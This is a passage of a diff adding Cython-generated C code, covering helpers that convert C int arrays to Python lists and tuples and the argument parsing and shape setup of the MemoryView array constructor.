< __pyx_t_3; __pyx_t_4+=1) { + __pyx_v_i = __pyx_t_4; + + /* "carray.to_py":119 + * l = PyList_New(length) + * for i in range(length): + * value = v[i] # <<<<<<<<<<<<<< + * Py_INCREF(value) + * PyList_SET_ITEM(l, i, value) + */ + __pyx_t_1 = __Pyx_PyInt_From_int((__pyx_v_v[__pyx_v_i])); if (unlikely(!__pyx_t_1)) __PYX_ERR(1, 119, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __Pyx_XDECREF_SET(__pyx_v_value, __pyx_t_1); + __pyx_t_1 = 0; + + /* "carray.to_py":120 + * for i in range(length): + * value = v[i] + * Py_INCREF(value) # <<<<<<<<<<<<<< + * PyList_SET_ITEM(l, i, value) + * return l + */ + Py_INCREF(__pyx_v_value); + + /* "carray.to_py":121 + * value = v[i] + * Py_INCREF(value) + * PyList_SET_ITEM(l, i, value) # <<<<<<<<<<<<<< + * return l + * + */ + PyList_SET_ITEM(__pyx_v_l, __pyx_v_i, __pyx_v_value); + } + + /* "carray.to_py":122 + * Py_INCREF(value) + * PyList_SET_ITEM(l, i, value) + * return l # <<<<<<<<<<<<<< + * + * + */ + __Pyx_XDECREF(__pyx_r); + __Pyx_INCREF(__pyx_v_l); + __pyx_r = __pyx_v_l; + goto __pyx_L0; + + /* "carray.to_py":114 + * + * @cname("__Pyx_carray_to_py_int") + * cdef inline list __Pyx_carray_to_py_int(base_type *v, Py_ssize_t length): # <<<<<<<<<<<<<< + * cdef size_t i + * cdef object value + */ + + /* function exit code */ + __pyx_L1_error:; + __Pyx_XDECREF(__pyx_t_1); + __Pyx_AddTraceback("carray.to_py.__Pyx_carray_to_py_int", __pyx_clineno, __pyx_lineno, __pyx_filename); + __pyx_r = 0; + __pyx_L0:; + __Pyx_XDECREF(__pyx_v_value); + __Pyx_XDECREF(__pyx_v_l); + __Pyx_XGIVEREF(__pyx_r); + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +/* "carray.to_py":126 + * + * @cname("__Pyx_carray_to_tuple_int") + * cdef inline tuple __Pyx_carray_to_tuple_int(base_type *v, Py_ssize_t length): # <<<<<<<<<<<<<< + * cdef size_t i + * cdef object value + */ + +static CYTHON_INLINE PyObject *__Pyx_carray_to_tuple_int(int *__pyx_v_v, Py_ssize_t __pyx_v_length) { + size_t __pyx_v_i; + PyObject *__pyx_v_value = 0; + PyObject *__pyx_v_t = NULL; + PyObject *__pyx_r = NULL; + __Pyx_RefNannyDeclarations + PyObject *__pyx_t_1 = NULL; + size_t __pyx_t_2; + size_t __pyx_t_3; + size_t __pyx_t_4; + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + __Pyx_RefNannySetupContext("__Pyx_carray_to_tuple_int", 0); + + /* "carray.to_py":129 + * cdef size_t i + * cdef object value + * t = PyTuple_New(length) # <<<<<<<<<<<<<< + * for i in range(length): + * value = v[i] + */ + __pyx_t_1 = PyTuple_New(__pyx_v_length); if (unlikely(!__pyx_t_1)) __PYX_ERR(1, 129, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __pyx_v_t = ((PyObject*)__pyx_t_1); + __pyx_t_1 = 0; + + /* "carray.to_py":130 + * cdef object value + * t = PyTuple_New(length) + * for i in range(length): # <<<<<<<<<<<<<< + * value = v[i] + * Py_INCREF(value) + */ + __pyx_t_2 = ((size_t)__pyx_v_length); + __pyx_t_3 = __pyx_t_2; + for (__pyx_t_4 = 0; __pyx_t_4 < __pyx_t_3; __pyx_t_4+=1) { + __pyx_v_i = __pyx_t_4; + + /* "carray.to_py":131 + * t = PyTuple_New(length) + * for i in range(length): + * value = v[i] # <<<<<<<<<<<<<< + * Py_INCREF(value) + * PyTuple_SET_ITEM(t, i, value) + */ + __pyx_t_1 = __Pyx_PyInt_From_int((__pyx_v_v[__pyx_v_i])); if (unlikely(!__pyx_t_1)) __PYX_ERR(1, 131, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __Pyx_XDECREF_SET(__pyx_v_value, __pyx_t_1); + __pyx_t_1 = 0; + + /* "carray.to_py":132 + * for i in range(length): + * value = v[i] + * Py_INCREF(value) # <<<<<<<<<<<<<< + * PyTuple_SET_ITEM(t, i, value) + * return t + */ + Py_INCREF(__pyx_v_value); + + /* "carray.to_py":133 + * value = v[i] + * Py_INCREF(value) + * PyTuple_SET_ITEM(t, i, value) # <<<<<<<<<<<<<< + * return t + */ + PyTuple_SET_ITEM(__pyx_v_t, __pyx_v_i, __pyx_v_value); + } + + /* "carray.to_py":134 + * Py_INCREF(value) + * PyTuple_SET_ITEM(t, i, value) + * return t # <<<<<<<<<<<<<< + */ + __Pyx_XDECREF(__pyx_r); + __Pyx_INCREF(__pyx_v_t); + __pyx_r = __pyx_v_t; + goto __pyx_L0; + + /* "carray.to_py":126 + * + * @cname("__Pyx_carray_to_tuple_int") + * cdef inline tuple __Pyx_carray_to_tuple_int(base_type *v, Py_ssize_t length): # <<<<<<<<<<<<<< + * cdef size_t i + * cdef object value + */ + + /* function exit code */ + __pyx_L1_error:; + __Pyx_XDECREF(__pyx_t_1); + __Pyx_AddTraceback("carray.to_py.__Pyx_carray_to_tuple_int", __pyx_clineno, __pyx_lineno, __pyx_filename); + __pyx_r = 0; + __pyx_L0:; + __Pyx_XDECREF(__pyx_v_value); + __Pyx_XDECREF(__pyx_v_t); + __Pyx_XGIVEREF(__pyx_r); + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +/* "View.MemoryView":131 + * cdef bint dtype_is_object + * + * def __cinit__(array self, tuple shape, Py_ssize_t itemsize, format not None, # <<<<<<<<<<<<<< + * mode="c", bint allocate_buffer=True): + * + */ + +/* Python wrapper */ +static int __pyx_array___cinit__(PyObject *__pyx_v_self, PyObject *__pyx_args, PyObject *__pyx_kwds); /*proto*/ +static int __pyx_array___cinit__(PyObject *__pyx_v_self, PyObject *__pyx_args, PyObject *__pyx_kwds) { + PyObject *__pyx_v_shape = 0; + Py_ssize_t __pyx_v_itemsize; + PyObject *__pyx_v_format = 0; + PyObject *__pyx_v_mode = 0; + int __pyx_v_allocate_buffer; + CYTHON_UNUSED const Py_ssize_t __pyx_nargs = PyTuple_GET_SIZE(__pyx_args); + CYTHON_UNUSED PyObject *const *__pyx_kwvalues = __Pyx_KwValues_VARARGS(__pyx_args, __pyx_nargs); + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + int __pyx_r; + __Pyx_RefNannyDeclarations + __Pyx_RefNannySetupContext("__cinit__ (wrapper)", 0); + { + PyObject **__pyx_pyargnames[] = {&__pyx_n_s_shape,&__pyx_n_s_itemsize,&__pyx_n_s_format,&__pyx_n_s_mode,&__pyx_n_s_allocate_buffer,0}; + PyObject* values[5] = {0,0,0,0,0}; + values[3] = ((PyObject *)__pyx_n_s_c); + if (__pyx_kwds) { + Py_ssize_t kw_args; + switch (__pyx_nargs) { + case 5: values[4] = __Pyx_Arg_VARARGS(__pyx_args, 4); + CYTHON_FALLTHROUGH; + case 4: values[3] = __Pyx_Arg_VARARGS(__pyx_args, 3); + CYTHON_FALLTHROUGH; + case 3: values[2] = __Pyx_Arg_VARARGS(__pyx_args, 2); + CYTHON_FALLTHROUGH; + case 2: values[1] = __Pyx_Arg_VARARGS(__pyx_args, 1); + CYTHON_FALLTHROUGH; + case 1: values[0] = __Pyx_Arg_VARARGS(__pyx_args, 0); + CYTHON_FALLTHROUGH; + case 0: break; + default: goto __pyx_L5_argtuple_error; + } + kw_args = __Pyx_NumKwargs_VARARGS(__pyx_kwds); + switch (__pyx_nargs) { + case 0: + if (likely((values[0] = __Pyx_GetKwValue_VARARGS(__pyx_kwds, __pyx_kwvalues, __pyx_n_s_shape)) != 0)) kw_args--; + else if (unlikely(PyErr_Occurred())) __PYX_ERR(1, 131, __pyx_L3_error) + else goto __pyx_L5_argtuple_error; + CYTHON_FALLTHROUGH; + case 1: + if (likely((values[1] = __Pyx_GetKwValue_VARARGS(__pyx_kwds, __pyx_kwvalues, __pyx_n_s_itemsize)) != 0)) kw_args--; + else if (unlikely(PyErr_Occurred())) __PYX_ERR(1, 131, __pyx_L3_error) + else { + __Pyx_RaiseArgtupleInvalid("__cinit__", 0, 3, 5, 1); __PYX_ERR(1, 131, __pyx_L3_error) + } + CYTHON_FALLTHROUGH; + case 2: + if (likely((values[2] = __Pyx_GetKwValue_VARARGS(__pyx_kwds, __pyx_kwvalues, __pyx_n_s_format)) != 0)) kw_args--; + else if (unlikely(PyErr_Occurred())) __PYX_ERR(1, 131, __pyx_L3_error) + else { + __Pyx_RaiseArgtupleInvalid("__cinit__", 0, 3, 5, 2); __PYX_ERR(1, 131, __pyx_L3_error) + } + CYTHON_FALLTHROUGH; + case 3: + if (kw_args > 0) { + PyObject* value = __Pyx_GetKwValue_VARARGS(__pyx_kwds, __pyx_kwvalues, __pyx_n_s_mode); + if (value) { values[3] = value; kw_args--; } + else if (unlikely(PyErr_Occurred())) __PYX_ERR(1, 131, __pyx_L3_error) + } + CYTHON_FALLTHROUGH; + case 4: + if (kw_args > 0) { + PyObject* value = __Pyx_GetKwValue_VARARGS(__pyx_kwds, __pyx_kwvalues, __pyx_n_s_allocate_buffer); + if (value) { values[4] = value; kw_args--; } + else if (unlikely(PyErr_Occurred())) __PYX_ERR(1, 131, __pyx_L3_error) + } + } + if (unlikely(kw_args > 0)) { + const Py_ssize_t kwd_pos_args = __pyx_nargs; + if (unlikely(__Pyx_ParseOptionalKeywords(__pyx_kwds, __pyx_kwvalues, __pyx_pyargnames, 0, values + 0, kwd_pos_args, "__cinit__") < 0)) __PYX_ERR(1, 131, __pyx_L3_error) + } + } else { + switch (__pyx_nargs) { + case 5: values[4] = __Pyx_Arg_VARARGS(__pyx_args, 4); + CYTHON_FALLTHROUGH; + case 4: values[3] = __Pyx_Arg_VARARGS(__pyx_args, 3); + CYTHON_FALLTHROUGH; + case 3: values[2] = __Pyx_Arg_VARARGS(__pyx_args, 2); + values[1] = __Pyx_Arg_VARARGS(__pyx_args, 1); + values[0] = __Pyx_Arg_VARARGS(__pyx_args, 0); + break; + default: goto __pyx_L5_argtuple_error; + } + } + __pyx_v_shape = ((PyObject*)values[0]); + __pyx_v_itemsize = __Pyx_PyIndex_AsSsize_t(values[1]); if (unlikely((__pyx_v_itemsize == (Py_ssize_t)-1) && PyErr_Occurred())) __PYX_ERR(1, 131, __pyx_L3_error) + __pyx_v_format = values[2]; + __pyx_v_mode = values[3]; + if (values[4]) { + __pyx_v_allocate_buffer = __Pyx_PyObject_IsTrue(values[4]); if (unlikely((__pyx_v_allocate_buffer == (int)-1) && PyErr_Occurred())) __PYX_ERR(1, 132, __pyx_L3_error) + } else { + + /* "View.MemoryView":132 + * + * def __cinit__(array self, tuple shape, Py_ssize_t itemsize, format not None, + * mode="c", bint allocate_buffer=True): # <<<<<<<<<<<<<< + * + * cdef int idx + */ + __pyx_v_allocate_buffer = ((int)1); + } + } + goto __pyx_L4_argument_unpacking_done; + __pyx_L5_argtuple_error:; + __Pyx_RaiseArgtupleInvalid("__cinit__", 0, 3, 5, __pyx_nargs); __PYX_ERR(1, 131, __pyx_L3_error) + __pyx_L3_error:; + __Pyx_AddTraceback("View.MemoryView.array.__cinit__", __pyx_clineno, __pyx_lineno, __pyx_filename); + __Pyx_RefNannyFinishContext(); + return -1; + __pyx_L4_argument_unpacking_done:; + if (unlikely(!__Pyx_ArgTypeTest(((PyObject *)__pyx_v_shape), (&PyTuple_Type), 1, "shape", 1))) __PYX_ERR(1, 131, __pyx_L1_error) + if (unlikely(((PyObject *)__pyx_v_format) == Py_None)) { + PyErr_Format(PyExc_TypeError, "Argument '%.200s' must not be None", "format"); __PYX_ERR(1, 131, __pyx_L1_error) + } + __pyx_r = __pyx_array___pyx_pf_15View_dot_MemoryView_5array___cinit__(((struct __pyx_array_obj *)__pyx_v_self), __pyx_v_shape, __pyx_v_itemsize, __pyx_v_format, __pyx_v_mode, __pyx_v_allocate_buffer); + + /* "View.MemoryView":131 + * cdef bint dtype_is_object + * + * def __cinit__(array self, tuple shape, Py_ssize_t itemsize, format not None, # <<<<<<<<<<<<<< + * mode="c", bint allocate_buffer=True): + * + */ + + /* function exit code */ + goto __pyx_L0; + __pyx_L1_error:; + __pyx_r = -1; + __pyx_L0:; + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +static int __pyx_array___pyx_pf_15View_dot_MemoryView_5array___cinit__(struct __pyx_array_obj *__pyx_v_self, PyObject *__pyx_v_shape, Py_ssize_t __pyx_v_itemsize, PyObject *__pyx_v_format, PyObject *__pyx_v_mode, int __pyx_v_allocate_buffer) { + int __pyx_v_idx; + Py_ssize_t __pyx_v_dim; + char __pyx_v_order; + int __pyx_r; + __Pyx_RefNannyDeclarations + Py_ssize_t __pyx_t_1; + int __pyx_t_2; + int __pyx_t_3; + PyObject *__pyx_t_4 = NULL; + PyObject *__pyx_t_5 = NULL; + PyObject *__pyx_t_6 = NULL; + int __pyx_t_7; + char *__pyx_t_8; + Py_ssize_t __pyx_t_9; + Py_UCS4 __pyx_t_10; + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + __Pyx_RefNannySetupContext("__cinit__", 0); + __Pyx_INCREF(__pyx_v_format); + + /* "View.MemoryView":137 + * cdef Py_ssize_t dim + * + * self.ndim = len(shape) # <<<<<<<<<<<<<< + * self.itemsize = itemsize + * + */ + if (unlikely(__pyx_v_shape == Py_None)) { + PyErr_SetString(PyExc_TypeError, "object of type 'NoneType' has no len()"); + __PYX_ERR(1, 137, __pyx_L1_error) + } + __pyx_t_1 = PyTuple_GET_SIZE(__pyx_v_shape); if (unlikely(__pyx_t_1 == ((Py_ssize_t)-1))) __PYX_ERR(1, 137, __pyx_L1_error) + __pyx_v_self->ndim = ((int)__pyx_t_1); + + /* "View.MemoryView":138 + * + * self.ndim = len(shape) + * self.itemsize = itemsize # <<<<<<<<<<<<<< + * + * if not self.ndim: + */ + __pyx_v_self->itemsize = __pyx_v_itemsize; + + /* "View.MemoryView":140 + * self.itemsize = itemsize + * + * if not self.ndim: # <<<<<<<<<<<<<< + * raise ValueError, "Empty shape tuple for cython.array" + * + */ + __pyx_t_2 = (!(__pyx_v_self->ndim != 0)); + if (unlikely(__pyx_t_2)) { + + /* "View.MemoryView":141 + * + * if not self.ndim: + * raise ValueError, "Empty shape tuple for cython.array" # <<<<<<<<<<<<<< + * + * if itemsize <= 0: + */ + __Pyx_Raise(__pyx_builtin_ValueError, __pyx_kp_s_Empty_shape_tuple_for_cython_arr, 0, 0); + __PYX_ERR(1, 141, __pyx_L1_error) + + /* "View.MemoryView":140 + * self.itemsize = itemsize + * + * if not self.ndim: # <<<<<<<<<<<<<< + * raise ValueError, "Empty shape tuple for cython.array" + * + */ + } + + /* "View.MemoryView":143 + * raise ValueError, "Empty shape tuple for cython.array" + * + * if itemsize <= 0: # <<<<<<<<<<<<<< + * raise ValueError, "itemsize <= 0 for cython.array" + * + */ + __pyx_t_2 = (__pyx_v_itemsize <= 0); + if (unlikely(__pyx_t_2)) { + + /* "View.MemoryView":144 + * + * if itemsize <= 0: + * raise ValueError, "itemsize <= 0 for cython.array" # <<<<<<<<<<<<<< + * + * if not isinstance(format, bytes): + */ + __Pyx_Raise(__pyx_builtin_ValueError, __pyx_kp_s_itemsize_0_for_cython_array, 0, 0); + __PYX_ERR(1, 144, __pyx_L1_error) + + /* "View.MemoryView":143 + * raise ValueError, "Empty shape tuple for cython.array" + * + * if itemsize <= 0: # <<<<<<<<<<<<<< + * raise ValueError, "itemsize <= 0 for cython.array" + * + */ + } + + /* "View.MemoryView":146 + * raise ValueError, "itemsize <= 0 for cython.array" + * + * if not isinstance(format, bytes): # <<<<<<<<<<<<<< + * format = format.encode('ASCII') + * self._format = format # keep a reference to the byte string + */ + __pyx_t_2 = PyBytes_Check(__pyx_v_format); + __pyx_t_3 = (!__pyx_t_2); + if (__pyx_t_3) { + + /* "View.MemoryView":147 + * + * if not isinstance(format, bytes): + * format = format.encode('ASCII') # <<<<<<<<<<<<<< + * self._format = format # keep a reference to the byte string + * self.format = self._format + */ + __pyx_t_5 = __Pyx_PyObject_GetAttrStr(__pyx_v_format, __pyx_n_s_encode); if (unlikely(!__pyx_t_5)) __PYX_ERR(1, 147, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_5); + __pyx_t_6 = NULL; + __pyx_t_7 = 0; + if (CYTHON_UNPACK_METHODS && likely(PyMethod_Check(__pyx_t_5))) { + __pyx_t_6 = PyMethod_GET_SELF(__pyx_t_5); + if (likely(__pyx_t_6)) { + PyObject* function = PyMethod_GET_FUNCTION(__pyx_t_5); + __Pyx_INCREF(__pyx_t_6); + __Pyx_INCREF(function); + __Pyx_DECREF_SET(__pyx_t_5, function); + __pyx_t_7 = 1; + } + } + { + PyObject *__pyx_callargs[2] = {__pyx_t_6, __pyx_n_s_ASCII}; + __pyx_t_4 = __Pyx_PyObject_FastCall(__pyx_t_5, __pyx_callargs+1-__pyx_t_7, 1+__pyx_t_7); + __Pyx_XDECREF(__pyx_t_6); __pyx_t_6 = 0; + if (unlikely(!__pyx_t_4)) __PYX_ERR(1, 147, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_4); + __Pyx_DECREF(__pyx_t_5); __pyx_t_5 = 0; + } + __Pyx_DECREF_SET(__pyx_v_format, __pyx_t_4); + __pyx_t_4 = 0; + + /* "View.MemoryView":146 + * raise ValueError, "itemsize <= 0 for cython.array" + * + * if not isinstance(format, bytes): # <<<<<<<<<<<<<< + * format = format.encode('ASCII') + * self._format = format # keep a reference to the byte string + */ + } + + /* "View.MemoryView":148 + * if not isinstance(format, bytes): + * format = format.encode('ASCII') + * self._format = format # keep a reference to the byte string # <<<<<<<<<<<<<< + * self.format = self._format + * + */ + if (!(likely(PyBytes_CheckExact(__pyx_v_format))||((__pyx_v_format) == Py_None) || __Pyx_RaiseUnexpectedTypeError("bytes", __pyx_v_format))) __PYX_ERR(1, 148, __pyx_L1_error) + __pyx_t_4 = __pyx_v_format; + __Pyx_INCREF(__pyx_t_4); + __Pyx_GIVEREF(__pyx_t_4); + __Pyx_GOTREF(__pyx_v_self->_format); + __Pyx_DECREF(__pyx_v_self->_format); + __pyx_v_self->_format = ((PyObject*)__pyx_t_4); + __pyx_t_4 = 0; + + /* "View.MemoryView":149 + * format = format.encode('ASCII') + * self._format = format # keep a reference to the byte string + * self.format = self._format # <<<<<<<<<<<<<< + * + * + */ + if (unlikely(__pyx_v_self->_format == Py_None)) { + PyErr_SetString(PyExc_TypeError, "expected bytes, NoneType found"); + __PYX_ERR(1, 149, __pyx_L1_error) + } + __pyx_t_8 = __Pyx_PyBytes_AsWritableString(__pyx_v_self->_format); if (unlikely((!__pyx_t_8) && PyErr_Occurred())) __PYX_ERR(1, 149, __pyx_L1_error) + __pyx_v_self->format = __pyx_t_8; + + /* "View.MemoryView":152 + * + * + * self._shape = PyObject_Malloc(sizeof(Py_ssize_t)*self.ndim*2) # <<<<<<<<<<<<<< + * self._strides = self._shape + self.ndim + * + */ + __pyx_v_self->_shape = ((Py_ssize_t *)PyObject_Malloc((((sizeof(Py_ssize_t)) * __pyx_v_self->ndim) * 2))); + + /* "View.MemoryView":153 + * + * self._shape = PyObject_Malloc(sizeof(Py_ssize_t)*self.ndim*2) + * self._strides = self._shape + self.ndim # <<<<<<<<<<<<<< + * + * if not self._shape: + */ + __pyx_v_self->_strides = (__pyx_v_self->_shape + __pyx_v_self->ndim); + + /* "View.MemoryView":155 + * self._strides = self._shape + self.ndim + * + * if not self._shape: # <<<<<<<<<<<<<< + * raise MemoryError, "unable to allocate shape and strides." + * + */ + __pyx_t_3 = (!(__pyx_v_self->_shape != 0)); + if (unlikely(__pyx_t_3)) { + + /* "View.MemoryView":156 + * + * if not self._shape: + * raise MemoryError, "unable to allocate shape and strides." # <<<<<<<<<<<<<< + * + * + */ + __Pyx_Raise(__pyx_builtin_MemoryError, __pyx_kp_s_unable_to_allocate_shape_and_str, 0, 0); + __PYX_ERR(1, 156, __pyx_L1_error) + + /* "View.MemoryView":155 + * self._strides = self._shape + self.ndim + * + * if not self._shape: # <<<<<<<<<<<<<< + * raise MemoryError, "unable to allocate shape and strides." + * + */ + } + + /* "View.MemoryView":159 + * + * + * for idx, dim in enumerate(shape): # <<<<<<<<<<<<<< + * if dim <= 0: + * raise ValueError, f"Invalid shape in axis {idx}: {dim}." + */ + __pyx_t_7 = 0; + __pyx_t_4 = __pyx_v_shape; __Pyx_INCREF(__pyx_t_4); __pyx_t_1 = 0; + for (;;) { + if (__pyx_t_1 >= PyTuple_GET_SIZE(__pyx_t_4)) break; + #if CYTHON_ASSUME_SAFE_MACROS && !CYTHON_AVOID_BORROWED_REFS + __pyx_t_5 = PyTuple_GET_ITEM(__pyx_t_4, __pyx_t_1); __Pyx_INCREF(__pyx_t_5); __pyx_t_1++; if (unlikely((0 < 0))) __PYX_ERR(1, 159, __pyx_L1_error) + #else + __pyx_t_5 = PySequence_ITEM(__pyx_t_4, __pyx_t_1); __pyx_t_1++; if (unlikely(!__pyx_t_5)) __PYX_ERR(1, 159, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_5); + #endif + __pyx_t_9 = __Pyx_PyIndex_AsSsize_t(__pyx_t_5); if (unlikely((__pyx_t_9 == (Py_ssize_t)-1) && PyErr_Occurred())) __PYX_ERR(1, 159, __pyx_L1_error) + __Pyx_DECREF(__pyx_t_5); __pyx_t_5 = 0; + __pyx_v_dim = __pyx_t_9; + __pyx_v_idx = __pyx_t_7; + __pyx_t_7 = (__pyx_t_7 + 1); + + /* "View.MemoryView":160 + * + * for idx, dim in enumerate(shape): + * if dim <= 0: # <<<<<<<<<<<<<< + * raise ValueError, f"Invalid shape in axis {idx}: {dim}." + * self._shape[idx] = dim + */ + __pyx_t_3 = (__pyx_v_dim <= 0); + if (unlikely(__pyx_t_3)) { + + /* "View.MemoryView":161 + * for idx, dim in enumerate(shape): + * if dim <= 0: + * raise ValueError, f"Invalid shape in axis {idx}: {dim}." # <<<<<<<<<<<<<< + * self._shape[idx] = dim + * + */ + __pyx_t_5 = PyTuple_New(5); if (unlikely(!__pyx_t_5)) __PYX_ERR(1, 161, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_5); + __pyx_t_9 = 0; + __pyx_t_10 = 127; + __Pyx_INCREF(__pyx_kp_u_Invalid_shape_in_axis); + __pyx_t_9 += 22; + __Pyx_GIVEREF(__pyx_kp_u_Invalid_shape_in_axis); + PyTuple_SET_ITEM(__pyx_t_5, 0, __pyx_kp_u_Invalid_shape_in_axis); + __pyx_t_6 = __Pyx_PyUnicode_From_int(__pyx_v_idx, 0, ' ', 'd'); if (unlikely(!__pyx_t_6)) __PYX_ERR(1, 161, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_6); + __pyx_t_9 += __Pyx_PyUnicode_GET_LENGTH(__pyx_t_6); + __Pyx_GIVEREF(__pyx_t_6); + PyTuple_SET_ITEM(__pyx_t_5, 1, __pyx_t_6); + __pyx_t_6 = 0; + __Pyx_INCREF(__pyx_kp_u_); + __pyx_t_9 += 2; + __Pyx_GIVEREF(__pyx_kp_u_); + PyTuple_SET_ITEM(__pyx_t_5, 2, __pyx_kp_u_); + __pyx_t_6 = __Pyx_PyUnicode_From_Py_ssize_t(__pyx_v_dim, 0, ' ', 'd'); if (unlikely(!__pyx_t_6)) __PYX_ERR(1, 161, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_6); + __pyx_t_9 += __Pyx_PyUnicode_GET_LENGTH(__pyx_t_6); + __Pyx_GIVEREF(__pyx_t_6); + PyTuple_SET_ITEM(__pyx_t_5, 3, __pyx_t_6); + __pyx_t_6 = 0; + __Pyx_INCREF(__pyx_kp_u__2); + __pyx_t_9 += 1; + __Pyx_GIVEREF(__pyx_kp_u__2); + PyTuple_SET_ITEM(__pyx_t_5, 4, __pyx_kp_u__2); + __pyx_t_6 = __Pyx_PyUnicode_Join(__pyx_t_5, 5, __pyx_t_9, __pyx_t_10); if (unlikely(!__pyx_t_6)) __PYX_ERR(1, 161, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_6); + __Pyx_DECREF(__pyx_t_5); __pyx_t_5 = 0; + __Pyx_Raise(__pyx_builtin_ValueError, __pyx_t_6, 0, 0); + __Pyx_DECREF(__pyx_t_6); __pyx_t_6 = 0; + __PYX_ERR(1, 161, __pyx_L1_error) + + /* "View.MemoryView":160 + * + * for idx, dim in enumerate(shape): + * if dim <= 0: # <<<<<<<<<<<<<< + * raise ValueError, f"Invalid shape in axis {idx}: {dim}." + * self._shape[idx] = dim + */ + } + + /* "View.MemoryView":162 + * if dim <= 0: + * raise ValueError, f"Invalid shape in axis {idx}: {dim}." + * self._shape[idx] = dim # <<<<<<<<<<<<<< + * + * cdef char order + */ + (__pyx_v_self->_shape[__pyx_v_idx]) = __pyx_v_dim; + + /* "View.MemoryView":159 + * + * + * for idx, dim in enumerate(shape): # <<<<<<<<<<<<<< + * if dim <= 0: + * raise ValueError, f"Invalid shape in axis {idx}: {dim}." + */ + } + __Pyx_DECREF(__pyx_t_4); __pyx_t_4 = 0; + + /* "View.MemoryView":165 + * + * cdef char order + * if mode == 'c': # <<<<<<<<<<<<<< + * order = b'C' + * self.mode = u'c' + */ + __pyx_t_3 = (__Pyx_PyString_Equals(__pyx_v_mode, __pyx_n_s_c, Py_EQ)); if (unlikely((__pyx_t_3 < 0))) __PYX_ERR(1, 165, __pyx_L1_error) + if (__pyx_t_3) { + + /* "View.MemoryView":166 + * cdef char order + * if mode == 'c': + * order = b'C' # <<<<<<<<<<<<<< + * self.mode = u'c' + * elif mode == 'fortran': + */ + __pyx_v_order = 'C'; + + /* "View.MemoryView":167 + * if mode == 'c': + * order = b'C' + * self.mode = u'c' # <<<<<<<<<<<<<< + * elif mode == 'fortran': + * order = b'F' + */ + __Pyx_INCREF(__pyx_n_u_c); + __Pyx_GIVEREF(__pyx_n_u_c); + __Pyx_GOTREF(__pyx_v_self->mode); + __Pyx_DECREF(__pyx_v_self->mode); + __pyx_v_self->mode = __pyx_n_u_c; + + /* "View.MemoryView":165 + * + * cdef char order + * if mode == 'c': # <<<<<<<<<<<<<< + * order = b'C' + * self.mode = u'c' + */ + goto __pyx_L11; + } + + /* "View.MemoryView":168 + * order = b'C' + * self.mode = u'c' + * elif mode == 'fortran': # <<<<<<<<<<<<<< + * order = b'F' + * self.mode = u'fortran' + */ + __pyx_t_3 = (__Pyx_PyString_Equals(__pyx_v_mode, __pyx_n_s_fortran, Py_EQ)); if (unlikely((__pyx_t_3 < 0))) __PYX_ERR(1, 168, __pyx_L1_error) + if (likely(__pyx_t_3)) { + + /* "View.MemoryView":169 + * self.mode = u'c' + * elif mode == 'fortran': + * order = b'F' # <<<<<<<<<<<<<< + * self.mode = u'fortran' + * else: + */ + __pyx_v_order = 'F'; + + /* "View.MemoryView":170 + * elif mode == 'fortran': + * order = b'F' + * self.mode = u'fortran' # <<<<<<<<<<<<<< + * else: + * raise ValueError, f"Invalid mode, expected 'c' or 'fortran', got {mode}" + */ + __Pyx_INCREF(__pyx_n_u_fortran); + __Pyx_GIVEREF(__pyx_n_u_fortran); + __Pyx_GOTREF(__pyx_v_self->mode); + __Pyx_DECREF(__pyx_v_self->mode); + __pyx_v_self->mode = __pyx_n_u_fortran; + + /* "View.MemoryView":168 + * order = b'C' + * self.mode = u'c' + * elif mode == 'fortran': # <<<<<<<<<<<<<< + * order = b'F' + * self.mode = u'fortran' + */ + goto __pyx_L11; + } + + /* "View.MemoryView":172 + * self.mode = u'fortran' + * else: + * raise ValueError, f"Invalid mode, expected 'c' or 'fortran', got {mode}" # <<<<<<<<<<<<<< + * + * self.len = fill_contig_strides_array(self._shape, self._strides, itemsize, self.ndim, order) + */ + /*else*/ { + __pyx_t_4 = __Pyx_PyObject_FormatSimple(__pyx_v_mode, __pyx_empty_unicode); if (unlikely(!__pyx_t_4)) __PYX_ERR(1, 172, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_4); + __pyx_t_6 = __Pyx_PyUnicode_Concat(__pyx_kp_u_Invalid_mode_expected_c_or_fortr, __pyx_t_4); if (unlikely(!__pyx_t_6)) __PYX_ERR(1, 172, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_6); + __Pyx_DECREF(__pyx_t_4); __pyx_t_4 = 0; + __Pyx_Raise(__pyx_builtin_ValueError, __pyx_t_6, 0, 0); + __Pyx_DECREF(__pyx_t_6); __pyx_t_6 = 0; + __PYX_ERR(1, 172, __pyx_L1_error) + } + __pyx_L11:; + + /* "View.MemoryView":174 + * raise ValueError, f"Invalid mode, expected 'c' or 'fortran', got {mode}" + * + * self.len = fill_contig_strides_array(self._shape, self._strides, itemsize, self.ndim, order) # <<<<<<<<<<<<<< + * + * self.free_data = allocate_buffer + */ + __pyx_v_self->len = __pyx_fill_contig_strides_array(__pyx_v_self->_shape, __pyx_v_self->_strides, __pyx_v_itemsize, __pyx_v_self->ndim, __pyx_v_order); + + /* "View.MemoryView":176 + * self.len = fill_contig_strides_array(self._shape, self._strides, itemsize, self.ndim, order) + * + * self.free_data = allocate_buffer # <<<<<<<<<<<<<< + * self.dtype_is_object = format == b'O' + * + */ + __pyx_v_self->free_data = __pyx_v_allocate_buffer; + + /* "View.MemoryView":177 + * + * self.free_data = allocate_buffer + * self.dtype_is_object = format == b'O' # <<<<<<<<<<<<<< + * + * if allocate_buffer: + */ + __pyx_t_6 = PyObject_RichCompare(__pyx_v_format, __pyx_n_b_O, Py_EQ); __Pyx_XGOTREF(__pyx_t_6); if (unlikely(!__pyx_t_6)) __PYX_ERR(1, 177, __pyx_L1_error) + 